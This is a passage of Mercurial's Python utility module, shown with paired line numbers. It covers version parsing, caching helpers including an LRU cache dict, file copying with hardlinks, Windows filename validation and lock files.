997 999 >>> versiontuple(v, 2)
998 1000 (3, 6)
999 1001 >>> versiontuple(v, 3)
1000 1002 (3, 6, 1)
1001 1003 >>> versiontuple(v, 4)
1002 1004 (3, 6, 1, '190-df9b73d2d444')
1003 1005
1004 1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1006 1008
1007 1009 >>> v = b'3.6'
1008 1010 >>> versiontuple(v, 2)
1009 1011 (3, 6)
1010 1012 >>> versiontuple(v, 3)
1011 1013 (3, 6, None)
1012 1014 >>> versiontuple(v, 4)
1013 1015 (3, 6, None, None)
1014 1016
1015 1017 >>> v = b'3.9-rc'
1016 1018 >>> versiontuple(v, 2)
1017 1019 (3, 9)
1018 1020 >>> versiontuple(v, 3)
1019 1021 (3, 9, None)
1020 1022 >>> versiontuple(v, 4)
1021 1023 (3, 9, None, 'rc')
1022 1024
1023 1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 1026 >>> versiontuple(v, 2)
1025 1027 (3, 9)
1026 1028 >>> versiontuple(v, 3)
1027 1029 (3, 9, None)
1028 1030 >>> versiontuple(v, 4)
1029 1031 (3, 9, None, 'rc+2-02a8fea4289b')
1030 1032
1031 1033 >>> versiontuple(b'4.6rc0')
1032 1034 (4, 6, None, 'rc0')
1033 1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 1036 (4, 6, None, 'rc0+12-425d55e54f98')
1035 1037 >>> versiontuple(b'.1.2.3')
1036 1038 (None, None, None, '.1.2.3')
1037 1039 >>> versiontuple(b'12.34..5')
1038 1040 (12, 34, None, '..5')
1039 1041 >>> versiontuple(b'1.2.3.4.5.6')
1040 1042 (1, 2, 3, '.4.5.6')
1041 1043 """
1042 1044 if not v:
1043 1045 v = version()
1044 1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 1047 if not m:
1046 1048 vparts, extra = '', v
1047 1049 elif m.group(2):
1048 1050 vparts, extra = m.groups()
1049 1051 else:
1050 1052 vparts, extra = m.group(1), None
1051 1053
1052 1054 vints = []
1053 1055 for i in vparts.split('.'):
1054 1056 try:
1055 1057 vints.append(int(i))
1056 1058 except ValueError:
1057 1059 break
1058 1060 # (3, 6) -> (3, 6, None)
1059 1061 while len(vints) < 3:
1060 1062 vints.append(None)
1061 1063
1062 1064 if n == 2:
1063 1065 return (vints[0], vints[1])
1064 1066 if n == 3:
1065 1067 return (vints[0], vints[1], vints[2])
1066 1068 if n == 4:
1067 1069 return (vints[0], vints[1], vints[2], extra)
1068 1070
1069 1071 def cachefunc(func):
1070 1072 '''cache the result of function calls'''
1071 1073 # XXX doesn't handle keywords args
1072 1074 if func.__code__.co_argcount == 0:
1073 1075 cache = []
1074 1076 def f():
1075 1077 if len(cache) == 0:
1076 1078 cache.append(func())
1077 1079 return cache[0]
1078 1080 return f
1079 1081 cache = {}
1080 1082 if func.__code__.co_argcount == 1:
1081 1083 # we gain a small amount of time because
1082 1084 # we don't need to pack/unpack the list
1083 1085 def f(arg):
1084 1086 if arg not in cache:
1085 1087 cache[arg] = func(arg)
1086 1088 return cache[arg]
1087 1089 else:
1088 1090 def f(*args):
1089 1091 if args not in cache:
1090 1092 cache[args] = func(*args)
1091 1093 return cache[args]
1092 1094
1093 1095 return f
1094 1096
1095 1097 class cow(object):
1096 1098 """helper class to make copy-on-write easier
1097 1099
1098 1100 Call preparewrite before doing any writes.
1099 1101 """
1100 1102
1101 1103 def preparewrite(self):
1102 1104 """call this before writes, return self or a copied new object"""
1103 1105 if getattr(self, '_copied', 0):
1104 1106 self._copied -= 1
1105 1107 return self.__class__(self)
1106 1108 return self
1107 1109
1108 1110 def copy(self):
1109 1111 """always do a cheap copy"""
1110 1112 self._copied = getattr(self, '_copied', 0) + 1
1111 1113 return self
1112 1114
1113 1115 class sortdict(collections.OrderedDict):
1114 1116 '''a simple sorted dictionary
1115 1117
1116 1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1117 1119 >>> d2 = d1.copy()
1118 1120 >>> d2
1119 1121 sortdict([('a', 0), ('b', 1)])
1120 1122 >>> d2.update([(b'a', 2)])
1121 1123 >>> list(d2.keys()) # should still be in last-set order
1122 1124 ['b', 'a']
1123 1125 '''
1124 1126
1125 1127 def __setitem__(self, key, value):
1126 1128 if key in self:
1127 1129 del self[key]
1128 1130 super(sortdict, self).__setitem__(key, value)
1129 1131
1130 1132 if pycompat.ispypy:
1131 1133 # __setitem__() isn't called as of PyPy 5.8.0
1132 1134 def update(self, src):
1133 1135 if isinstance(src, dict):
1134 1136 src = src.iteritems()
1135 1137 for k, v in src:
1136 1138 self[k] = v
1137 1139
1138 1140 class cowdict(cow, dict):
1139 1141 """copy-on-write dict
1140 1142
1141 1143 Be sure to call d = d.preparewrite() before writing to d.
1142 1144
1143 1145 >>> a = cowdict()
1144 1146 >>> a is a.preparewrite()
1145 1147 True
1146 1148 >>> b = a.copy()
1147 1149 >>> b is a
1148 1150 True
1149 1151 >>> c = b.copy()
1150 1152 >>> c is a
1151 1153 True
1152 1154 >>> a = a.preparewrite()
1153 1155 >>> b is a
1154 1156 False
1155 1157 >>> a is a.preparewrite()
1156 1158 True
1157 1159 >>> c = c.preparewrite()
1158 1160 >>> b is c
1159 1161 False
1160 1162 >>> b is b.preparewrite()
1161 1163 True
1162 1164 """
1163 1165
1164 1166 class cowsortdict(cow, sortdict):
1165 1167 """copy-on-write sortdict
1166 1168
1167 1169 Be sure to call d = d.preparewrite() before writing to d.
1168 1170 """
1169 1171
1170 1172 class transactional(object):
1171 1173 """Base class for making a transactional type into a context manager."""
1172 1174 __metaclass__ = abc.ABCMeta
1173 1175
1174 1176 @abc.abstractmethod
1175 1177 def close(self):
1176 1178 """Successfully closes the transaction."""
1177 1179
1178 1180 @abc.abstractmethod
1179 1181 def release(self):
1180 1182 """Marks the end of the transaction.
1181 1183
1182 1184 If the transaction has not been closed, it will be aborted.
1183 1185 """
1184 1186
1185 1187 def __enter__(self):
1186 1188 return self
1187 1189
1188 1190 def __exit__(self, exc_type, exc_val, exc_tb):
1189 1191 try:
1190 1192 if exc_type is None:
1191 1193 self.close()
1192 1194 finally:
1193 1195 self.release()
1194 1196
1195 1197 @contextlib.contextmanager
1196 1198 def acceptintervention(tr=None):
1197 1199 """A context manager that closes the transaction on InterventionRequired
1198 1200
1199 1201 If no transaction was provided, this simply runs the body and returns
1200 1202 """
1201 1203 if not tr:
1202 1204 yield
1203 1205 return
1204 1206 try:
1205 1207 yield
1206 1208 tr.close()
1207 1209 except error.InterventionRequired:
1208 1210 tr.close()
1209 1211 raise
1210 1212 finally:
1211 1213 tr.release()
1212 1214
1213 1215 @contextlib.contextmanager
1214 1216 def nullcontextmanager():
1215 1217 yield
1216 1218
1217 1219 class _lrucachenode(object):
1218 1220 """A node in a doubly linked list.
1219 1221
1220 1222 Holds a reference to nodes on either side as well as a key-value
1221 1223 pair for the dictionary entry.
1222 1224 """
1223 1225 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1224 1226
1225 1227 def __init__(self):
1226 1228 self.next = None
1227 1229 self.prev = None
1228 1230
1229 1231 self.key = _notset
1230 1232 self.value = None
1231 1233 self.cost = 0
1232 1234
1233 1235 def markempty(self):
1234 1236 """Mark the node as emptied."""
1235 1237 self.key = _notset
1236 1238 self.value = None
1237 1239 self.cost = 0
1238 1240
1239 1241 class lrucachedict(object):
1240 1242 """Dict that caches most recent accesses and sets.
1241 1243
1242 1244 The dict consists of an actual backing dict - indexed by original
1243 1245 key - and a doubly linked circular list defining the order of entries in
1244 1246 the cache.
1245 1247
1246 1248 The head node is the newest entry in the cache. If the cache is full,
1247 1249 we recycle head.prev and make it the new head. Cache accesses result in
1248 1250 the node being moved to before the existing head and being marked as the
1249 1251 new head node.
1250 1252
1251 1253 Items in the cache can be inserted with an optional "cost" value. This is
1252 1254 simply an integer that is specified by the caller. The cache can be queried
1253 1255 for the total cost of all items presently in the cache.
1254 1256
1255 1257 The cache can also define a maximum cost. If a cache insertion would
1256 1258 cause the total cost of the cache to go beyond the maximum cost limit,
1257 1259 nodes will be evicted to make room for the new code. This can be used
1258 1260 to e.g. set a max memory limit and associate an estimated bytes size
1259 1261 cost to each item in the cache. By default, no maximum cost is enforced.
1260 1262 """
1261 1263 def __init__(self, max, maxcost=0):
1262 1264 self._cache = {}
1263 1265
1264 1266 self._head = head = _lrucachenode()
1265 1267 head.prev = head
1266 1268 head.next = head
1267 1269 self._size = 1
1268 1270 self.capacity = max
1269 1271 self.totalcost = 0
1270 1272 self.maxcost = maxcost
1271 1273
1272 1274 def __len__(self):
1273 1275 return len(self._cache)
1274 1276
1275 1277 def __contains__(self, k):
1276 1278 return k in self._cache
1277 1279
1278 1280 def __iter__(self):
1279 1281 # We don't have to iterate in cache order, but why not.
1280 1282 n = self._head
1281 1283 for i in range(len(self._cache)):
1282 1284 yield n.key
1283 1285 n = n.next
1284 1286
1285 1287 def __getitem__(self, k):
1286 1288 node = self._cache[k]
1287 1289 self._movetohead(node)
1288 1290 return node.value
1289 1291
1290 1292 def insert(self, k, v, cost=0):
1291 1293 """Insert a new item in the cache with optional cost value."""
1292 1294 node = self._cache.get(k)
1293 1295 # Replace existing value and mark as newest.
1294 1296 if node is not None:
1295 1297 self.totalcost -= node.cost
1296 1298 node.value = v
1297 1299 node.cost = cost
1298 1300 self.totalcost += cost
1299 1301 self._movetohead(node)
1300 1302
1301 1303 if self.maxcost:
1302 1304 self._enforcecostlimit()
1303 1305
1304 1306 return
1305 1307
1306 1308 if self._size < self.capacity:
1307 1309 node = self._addcapacity()
1308 1310 else:
1309 1311 # Grab the last/oldest item.
1310 1312 node = self._head.prev
1311 1313
1312 1314 # At capacity. Kill the old entry.
1313 1315 if node.key is not _notset:
1314 1316 self.totalcost -= node.cost
1315 1317 del self._cache[node.key]
1316 1318
1317 1319 node.key = k
1318 1320 node.value = v
1319 1321 node.cost = cost
1320 1322 self.totalcost += cost
1321 1323 self._cache[k] = node
1322 1324 # And mark it as newest entry. No need to adjust order since it
1323 1325 # is already self._head.prev.
1324 1326 self._head = node
1325 1327
1326 1328 if self.maxcost:
1327 1329 self._enforcecostlimit()
1328 1330
1329 1331 def __setitem__(self, k, v):
1330 1332 self.insert(k, v)
1331 1333
1332 1334 def __delitem__(self, k):
1333 1335 self.pop(k)
1334 1336
1335 1337 def pop(self, k, default=_notset):
1336 1338 try:
1337 1339 node = self._cache.pop(k)
1338 1340 except KeyError:
1339 1341 if default is _notset:
1340 1342 raise
1341 1343 return default
1342 1344 value = node.value
1343 1345 self.totalcost -= node.cost
1344 1346 node.markempty()
1345 1347
1346 1348 # Temporarily mark as newest item before re-adjusting head to make
1347 1349 # this node the oldest item.
1348 1350 self._movetohead(node)
1349 1351 self._head = node.next
1350 1352
1351 1353 return value
1352 1354
1353 1355 # Additional dict methods.
1354 1356
1355 1357 def get(self, k, default=None):
1356 1358 try:
1357 1359 return self.__getitem__(k)
1358 1360 except KeyError:
1359 1361 return default
1360 1362
1361 1363 def peek(self, k, default=_notset):
1362 1364 """Get the specified item without moving it to the head
1363 1365
1364 1366 Unlike get(), this doesn't mutate the internal state. But be aware
1365 1367 that it doesn't mean peek() is thread safe.
1366 1368 """
1367 1369 try:
1368 1370 node = self._cache[k]
1369 1371 return node.value
1370 1372 except KeyError:
1371 1373 if default is _notset:
1372 1374 raise
1373 1375 return default
1374 1376
1375 1377 def clear(self):
1376 1378 n = self._head
1377 1379 while n.key is not _notset:
1378 1380 self.totalcost -= n.cost
1379 1381 n.markempty()
1380 1382 n = n.next
1381 1383
1382 1384 self._cache.clear()
1383 1385
1384 1386 def copy(self, capacity=None, maxcost=0):
1385 1387 """Create a new cache as a copy of the current one.
1386 1388
1387 1389 By default, the new cache has the same capacity as the existing one.
1388 1390 But, the cache capacity can be changed as part of performing the
1389 1391 copy.
1390 1392
1391 1393 Items in the copy have an insertion/access order matching this
1392 1394 instance.
1393 1395 """
1394 1396
1395 1397 capacity = capacity or self.capacity
1396 1398 maxcost = maxcost or self.maxcost
1397 1399 result = lrucachedict(capacity, maxcost=maxcost)
1398 1400
1399 1401 # We copy entries by iterating in oldest-to-newest order so the copy
1400 1402 # has the correct ordering.
1401 1403
1402 1404 # Find the first non-empty entry.
1403 1405 n = self._head.prev
1404 1406 while n.key is _notset and n is not self._head:
1405 1407 n = n.prev
1406 1408
1407 1409 # We could potentially skip the first N items when decreasing capacity.
1408 1410 # But let's keep it simple unless it is a performance problem.
1409 1411 for i in range(len(self._cache)):
1410 1412 result.insert(n.key, n.value, cost=n.cost)
1411 1413 n = n.prev
1412 1414
1413 1415 return result
1414 1416
1415 1417 def popoldest(self):
1416 1418 """Remove the oldest item from the cache.
1417 1419
1418 1420 Returns the (key, value) describing the removed cache entry.
1419 1421 """
1420 1422 if not self._cache:
1421 1423 return
1422 1424
1423 1425 # Walk the linked list backwards starting at tail node until we hit
1424 1426 # a non-empty node.
1425 1427 n = self._head.prev
1426 1428 while n.key is _notset:
1427 1429 n = n.prev
1428 1430
1429 1431 key, value = n.key, n.value
1430 1432
1431 1433 # And remove it from the cache and mark it as empty.
1432 1434 del self._cache[n.key]
1433 1435 self.totalcost -= n.cost
1434 1436 n.markempty()
1435 1437
1436 1438 return key, value
1437 1439
1438 1440 def _movetohead(self, node):
1439 1441 """Mark a node as the newest, making it the new head.
1440 1442
1441 1443 When a node is accessed, it becomes the freshest entry in the LRU
1442 1444 list, which is denoted by self._head.
1443 1445
1444 1446 Visually, let's make ``N`` the new head node (* denotes head):
1445 1447
1446 1448 previous/oldest <-> head <-> next/next newest
1447 1449
1448 1450 ----<->--- A* ---<->-----
1449 1451 | |
1450 1452 E <-> D <-> N <-> C <-> B
1451 1453
1452 1454 To:
1453 1455
1454 1456 ----<->--- N* ---<->-----
1455 1457 | |
1456 1458 E <-> D <-> C <-> B <-> A
1457 1459
1458 1460 This requires the following moves:
1459 1461
1460 1462 C.next = D (node.prev.next = node.next)
1461 1463 D.prev = C (node.next.prev = node.prev)
1462 1464 E.next = N (head.prev.next = node)
1463 1465 N.prev = E (node.prev = head.prev)
1464 1466 N.next = A (node.next = head)
1465 1467 A.prev = N (head.prev = node)
1466 1468 """
1467 1469 head = self._head
1468 1470 # C.next = D
1469 1471 node.prev.next = node.next
1470 1472 # D.prev = C
1471 1473 node.next.prev = node.prev
1472 1474 # N.prev = E
1473 1475 node.prev = head.prev
1474 1476 # N.next = A
1475 1477 # It is tempting to do just "head" here, however if node is
1476 1478 # adjacent to head, this will do bad things.
1477 1479 node.next = head.prev.next
1478 1480 # E.next = N
1479 1481 node.next.prev = node
1480 1482 # A.prev = N
1481 1483 node.prev.next = node
1482 1484
1483 1485 self._head = node
1484 1486
1485 1487 def _addcapacity(self):
1486 1488 """Add a node to the circular linked list.
1487 1489
1488 1490 The new node is inserted before the head node.
1489 1491 """
1490 1492 head = self._head
1491 1493 node = _lrucachenode()
1492 1494 head.prev.next = node
1493 1495 node.prev = head.prev
1494 1496 node.next = head
1495 1497 head.prev = node
1496 1498 self._size += 1
1497 1499 return node
1498 1500
1499 1501 def _enforcecostlimit(self):
1500 1502 # This should run after an insertion. It should only be called if total
1501 1503 # cost limits are being enforced.
1502 1504 # The most recently inserted node is never evicted.
1503 1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1504 1506 return
1505 1507
1506 1508 # This is logically equivalent to calling popoldest() until we
1507 1509 # free up enough cost. We don't do that since popoldest() needs
1508 1510 # to walk the linked list and doing this in a loop would be
1509 1511 # quadratic. So we find the first non-empty node and then
1510 1512 # walk nodes until we free up enough capacity.
1511 1513 #
1512 1514 # If we only removed the minimum number of nodes to free enough
1513 1515 # cost at insert time, chances are high that the next insert would
1514 1516 # also require pruning. This would effectively constitute quadratic
1515 1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1516 1518 # target cost that is a percentage of the max cost. This will tend
1517 1519 # to free more nodes when the high water mark is reached, which
1518 1520 # lowers the chances of needing to prune on the subsequent insert.
1519 1521 targetcost = int(self.maxcost * 0.75)
1520 1522
1521 1523 n = self._head.prev
1522 1524 while n.key is _notset:
1523 1525 n = n.prev
1524 1526
1525 1527 while len(self) > 1 and self.totalcost > targetcost:
1526 1528 del self._cache[n.key]
1527 1529 self.totalcost -= n.cost
1528 1530 n.markempty()
1529 1531 n = n.prev
1530 1532
1531 1533 def lrucachefunc(func):
1532 1534 '''cache most recent results of function calls'''
1533 1535 cache = {}
1534 1536 order = collections.deque()
1535 1537 if func.__code__.co_argcount == 1:
1536 1538 def f(arg):
1537 1539 if arg not in cache:
1538 1540 if len(cache) > 20:
1539 1541 del cache[order.popleft()]
1540 1542 cache[arg] = func(arg)
1541 1543 else:
1542 1544 order.remove(arg)
1543 1545 order.append(arg)
1544 1546 return cache[arg]
1545 1547 else:
1546 1548 def f(*args):
1547 1549 if args not in cache:
1548 1550 if len(cache) > 20:
1549 1551 del cache[order.popleft()]
1550 1552 cache[args] = func(*args)
1551 1553 else:
1552 1554 order.remove(args)
1553 1555 order.append(args)
1554 1556 return cache[args]
1555 1557
1556 1558 return f
1557 1559
1558 1560 class propertycache(object):
1559 1561 def __init__(self, func):
1560 1562 self.func = func
1561 1563 self.name = func.__name__
1562 1564 def __get__(self, obj, type=None):
1563 1565 result = self.func(obj)
1564 1566 self.cachevalue(obj, result)
1565 1567 return result
1566 1568
1567 1569 def cachevalue(self, obj, value):
1568 1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1569 1571 obj.__dict__[self.name] = value
1570 1572
1571 1573 def clearcachedproperty(obj, prop):
1572 1574 '''clear a cached property value, if one has been set'''
1573 1575 prop = pycompat.sysstr(prop)
1574 1576 if prop in obj.__dict__:
1575 1577 del obj.__dict__[prop]
1576 1578
1577 1579 def increasingchunks(source, min=1024, max=65536):
1578 1580 '''return no less than min bytes per chunk while data remains,
1579 1581 doubling min after each chunk until it reaches max'''
1580 1582 def log2(x):
1581 1583 if not x:
1582 1584 return 0
1583 1585 i = 0
1584 1586 while x:
1585 1587 x >>= 1
1586 1588 i += 1
1587 1589 return i - 1
1588 1590
1589 1591 buf = []
1590 1592 blen = 0
1591 1593 for chunk in source:
1592 1594 buf.append(chunk)
1593 1595 blen += len(chunk)
1594 1596 if blen >= min:
1595 1597 if min < max:
1596 1598 min = min << 1
1597 1599 nmin = 1 << log2(blen)
1598 1600 if nmin > min:
1599 1601 min = nmin
1600 1602 if min > max:
1601 1603 min = max
1602 1604 yield ''.join(buf)
1603 1605 blen = 0
1604 1606 buf = []
1605 1607 if buf:
1606 1608 yield ''.join(buf)
1607 1609
1608 1610 def always(fn):
1609 1611 return True
1610 1612
1611 1613 def never(fn):
1612 1614 return False
1613 1615
1614 1616 def nogc(func):
1615 1617 """disable garbage collector
1616 1618
1617 1619 Python's garbage collector triggers a GC each time a certain number of
1618 1620 container objects (the number being defined by gc.get_threshold()) are
1619 1621 allocated even when marked not to be tracked by the collector. Tracking has
1620 1622 no effect on when GCs are triggered, only on what objects the GC looks
1621 1623 into. As a workaround, disable GC while building complex (huge)
1622 1624 containers.
1623 1625
1624 1626 This garbage collector issue have been fixed in 2.7. But it still affect
1625 1627 CPython's performance.
1626 1628 """
1627 1629 def wrapper(*args, **kwargs):
1628 1630 gcenabled = gc.isenabled()
1629 1631 gc.disable()
1630 1632 try:
1631 1633 return func(*args, **kwargs)
1632 1634 finally:
1633 1635 if gcenabled:
1634 1636 gc.enable()
1635 1637 return wrapper
1636 1638
1637 1639 if pycompat.ispypy:
1638 1640 # PyPy runs slower with gc disabled
1639 1641 nogc = lambda x: x
1640 1642
1641 1643 def pathto(root, n1, n2):
1642 1644 '''return the relative path from one place to another.
1643 1645 root should use os.sep to separate directories
1644 1646 n1 should use os.sep to separate directories
1645 1647 n2 should use "/" to separate directories
1646 1648 returns an os.sep-separated path.
1647 1649
1648 1650 If n1 is a relative path, it's assumed it's
1649 1651 relative to root.
1650 1652 n2 should always be relative to root.
1651 1653 '''
1652 1654 if not n1:
1653 1655 return localpath(n2)
1654 1656 if os.path.isabs(n1):
1655 1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1658 return os.path.join(root, localpath(n2))
1657 1659 n2 = '/'.join((pconvert(root), n2))
1658 1660 a, b = splitpath(n1), n2.split('/')
1659 1661 a.reverse()
1660 1662 b.reverse()
1661 1663 while a and b and a[-1] == b[-1]:
1662 1664 a.pop()
1663 1665 b.pop()
1664 1666 b.reverse()
1665 1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1668
1667 1669 # the location of data files matching the source code
1668 1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1669 1671 # executable version (py2exe) doesn't support __file__
1670 1672 datapath = os.path.dirname(pycompat.sysexecutable)
1671 1673 else:
1672 1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1673 1675
1674 1676 i18n.setdatapath(datapath)
1675 1677
1676 1678 def checksignature(func):
1677 1679 '''wrap a function with code to check for calling errors'''
1678 1680 def check(*args, **kwargs):
1679 1681 try:
1680 1682 return func(*args, **kwargs)
1681 1683 except TypeError:
1682 1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1683 1685 raise error.SignatureError
1684 1686 raise
1685 1687
1686 1688 return check
1687 1689
1688 1690 # a whilelist of known filesystems where hardlink works reliably
1689 1691 _hardlinkfswhitelist = {
1690 1692 'apfs',
1691 1693 'btrfs',
1692 1694 'ext2',
1693 1695 'ext3',
1694 1696 'ext4',
1695 1697 'hfs',
1696 1698 'jfs',
1697 1699 'NTFS',
1698 1700 'reiserfs',
1699 1701 'tmpfs',
1700 1702 'ufs',
1701 1703 'xfs',
1702 1704 'zfs',
1703 1705 }
1704 1706
1705 1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1706 1708 '''copy a file, preserving mode and optionally other stat info like
1707 1709 atime/mtime
1708 1710
1709 1711 checkambig argument is used with filestat, and is useful only if
1710 1712 destination file is guarded by any lock (e.g. repo.lock or
1711 1713 repo.wlock).
1712 1714
1713 1715 copystat and checkambig should be exclusive.
1714 1716 '''
1715 1717 assert not (copystat and checkambig)
1716 1718 oldstat = None
1717 1719 if os.path.lexists(dest):
1718 1720 if checkambig:
1719 1721 oldstat = checkambig and filestat.frompath(dest)
1720 1722 unlink(dest)
1721 1723 if hardlink:
1722 1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1723 1725 # unless we are confident that dest is on a whitelisted filesystem.
1724 1726 try:
1725 1727 fstype = getfstype(os.path.dirname(dest))
1726 1728 except OSError:
1727 1729 fstype = None
1728 1730 if fstype not in _hardlinkfswhitelist:
1729 1731 hardlink = False
1730 1732 if hardlink:
1731 1733 try:
1732 1734 oslink(src, dest)
1733 1735 return
1734 1736 except (IOError, OSError):
1735 1737 pass # fall back to normal copy
1736 1738 if os.path.islink(src):
1737 1739 os.symlink(os.readlink(src), dest)
1738 1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1739 1741 # for them anyway
1740 1742 else:
1741 1743 try:
1742 1744 shutil.copyfile(src, dest)
1743 1745 if copystat:
1744 1746 # copystat also copies mode
1745 1747 shutil.copystat(src, dest)
1746 1748 else:
1747 1749 shutil.copymode(src, dest)
1748 1750 if oldstat and oldstat.stat:
1749 1751 newstat = filestat.frompath(dest)
1750 1752 if newstat.isambig(oldstat):
1751 1753 # stat of copied file is ambiguous to original one
1752 1754 advanced = (
1753 1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1754 1756 os.utime(dest, (advanced, advanced))
1755 1757 except shutil.Error as inst:
1756 1758 raise error.Abort(str(inst))
1757 1759
1758 1760 def copyfiles(src, dst, hardlink=None, progress=None):
1759 1761 """Copy a directory tree using hardlinks if possible."""
1760 1762 num = 0
1761 1763
1762 1764 def settopic():
1763 1765 if progress:
1764 1766 progress.topic = _('linking') if hardlink else _('copying')
1765 1767
1766 1768 if os.path.isdir(src):
1767 1769 if hardlink is None:
1768 1770 hardlink = (os.stat(src).st_dev ==
1769 1771 os.stat(os.path.dirname(dst)).st_dev)
1770 1772 settopic()
1771 1773 os.mkdir(dst)
1772 1774 for name, kind in listdir(src):
1773 1775 srcname = os.path.join(src, name)
1774 1776 dstname = os.path.join(dst, name)
1775 1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1776 1778 num += n
1777 1779 else:
1778 1780 if hardlink is None:
1779 1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1780 1782 os.stat(os.path.dirname(dst)).st_dev)
1781 1783 settopic()
1782 1784
1783 1785 if hardlink:
1784 1786 try:
1785 1787 oslink(src, dst)
1786 1788 except (IOError, OSError):
1787 1789 hardlink = False
1788 1790 shutil.copy(src, dst)
1789 1791 else:
1790 1792 shutil.copy(src, dst)
1791 1793 num += 1
1792 1794 if progress:
1793 1795 progress.increment()
1794 1796
1795 1797 return hardlink, num
1796 1798
1797 1799 _winreservednames = {
1798 1800 'con', 'prn', 'aux', 'nul',
1799 1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1800 1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1801 1803 }
1802 1804 _winreservedchars = ':*?"<>|'
1803 1805 def checkwinfilename(path):
1804 1806 r'''Check that the base-relative path is a valid filename on Windows.
1805 1807 Returns None if the path is ok, or a UI string describing the problem.
1806 1808
1807 1809 >>> checkwinfilename(b"just/a/normal/path")
1808 1810 >>> checkwinfilename(b"foo/bar/con.xml")
1809 1811 "filename contains 'con', which is reserved on Windows"
1810 1812 >>> checkwinfilename(b"foo/con.xml/bar")
1811 1813 "filename contains 'con', which is reserved on Windows"
1812 1814 >>> checkwinfilename(b"foo/bar/xml.con")
1813 1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1814 1816 "filename contains 'AUX', which is reserved on Windows"
1815 1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1816 1818 "filename contains ':', which is reserved on Windows"
1817 1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1818 1820 "filename contains '\\x07', which is invalid on Windows"
1819 1821 >>> checkwinfilename(b"foo/bar/bla ")
1820 1822 "filename ends with ' ', which is not allowed on Windows"
1821 1823 >>> checkwinfilename(b"../bar")
1822 1824 >>> checkwinfilename(b"foo\\")
1823 1825 "filename ends with '\\', which is invalid on Windows"
1824 1826 >>> checkwinfilename(b"foo\\/bar")
1825 1827 "directory name ends with '\\', which is invalid on Windows"
1826 1828 '''
1827 1829 if path.endswith('\\'):
1828 1830 return _("filename ends with '\\', which is invalid on Windows")
1829 1831 if '\\/' in path:
1830 1832 return _("directory name ends with '\\', which is invalid on Windows")
1831 1833 for n in path.replace('\\', '/').split('/'):
1832 1834 if not n:
1833 1835 continue
1834 1836 for c in _filenamebytestr(n):
1835 1837 if c in _winreservedchars:
1836 1838 return _("filename contains '%s', which is reserved "
1837 1839 "on Windows") % c
1838 1840 if ord(c) <= 31:
1839 1841 return _("filename contains '%s', which is invalid "
1840 1842 "on Windows") % stringutil.escapestr(c)
1841 1843 base = n.split('.')[0]
1842 1844 if base and base.lower() in _winreservednames:
1843 1845 return _("filename contains '%s', which is reserved "
1844 1846 "on Windows") % base
1845 1847 t = n[-1:]
1846 1848 if t in '. ' and n not in '..':
1847 1849 return _("filename ends with '%s', which is not allowed "
1848 1850 "on Windows") % t
1849 1851
1850 1852 if pycompat.iswindows:
1851 1853 checkosfilename = checkwinfilename
1852 1854 timer = time.clock
1853 1855 else:
1854 1856 checkosfilename = platform.checkosfilename
1855 1857 timer = time.time
1856 1858
1857 1859 if safehasattr(time, "perf_counter"):
1858 1860 timer = time.perf_counter
1859 1861
1860 1862 def makelock(info, pathname):
1861 1863 """Create a lock file atomically if possible
1862 1864
1863 1865 This may leave a stale lock file if symlink isn't supported and signal
1864 1866 interrupt is enabled.
1865 1867 """
1866 1868 try:
1867 1869 return os.symlink(info, pathname)
1868 1870 except OSError as why:
1869 1871 if why.errno == errno.EEXIST:
1870 1872 raise
1871 1873 except AttributeError: # no symlink in os
1872 1874 pass
1873 1875
1874 1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1875 1877 ld = os.open(pathname, flags)
1876 1878 os.write(ld, info)
1877 1879 os.close(ld)
1878 1880
1879 1881 def readlock(pathname):
1880 1882 try:
1881 1883 return readlink(pathname)
1882 1884 except OSError as why:
1883 1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1884 1886 raise
1885 1887 except AttributeError: # no symlink in os
1886 1888 pass
1887 1889 with posixfile(pathname, 'rb') as fp:
1888 1890 return fp.read()
1889 1891
1890 1892 def fstat(fp):
1891 1893 '''stat file object that may not have fileno method.'''
1892 1894 try:
1893 1895 return os.fstat(fp.fileno())
1894 1896 except AttributeError:
1895 1897 return os.stat(fp.name)
1896 1898
1897 1899 # File system features
1898 1900
1899 1901 def fscasesensitive(path):
1900 1902 """
1901 1903 Return true if the given path is on a case-sensitive filesystem
1902 1904
1903 1905 Requires a path (like /foo/.hg) ending with a foldable final
1904 1906 directory component.
1905 1907 """
1906 1908 s1 = os.lstat(path)
1907 1909 d, b = os.path.split(path)
1908 1910 b2 = b.upper()
1909 1911 if b == b2:
1910 1912 b2 = b.lower()
1911 1913 if b == b2:
1912 1914 return True # no evidence against case sensitivity
1913 1915 p2 = os.path.join(d, b2)
1914 1916 try:
1915 1917 s2 = os.lstat(p2)
1916 1918 if s2 == s1:
1917 1919 return False
1918 1920 return True
1919 1921 except OSError:
1920 1922 return True
1921 1923
1922 1924 try:
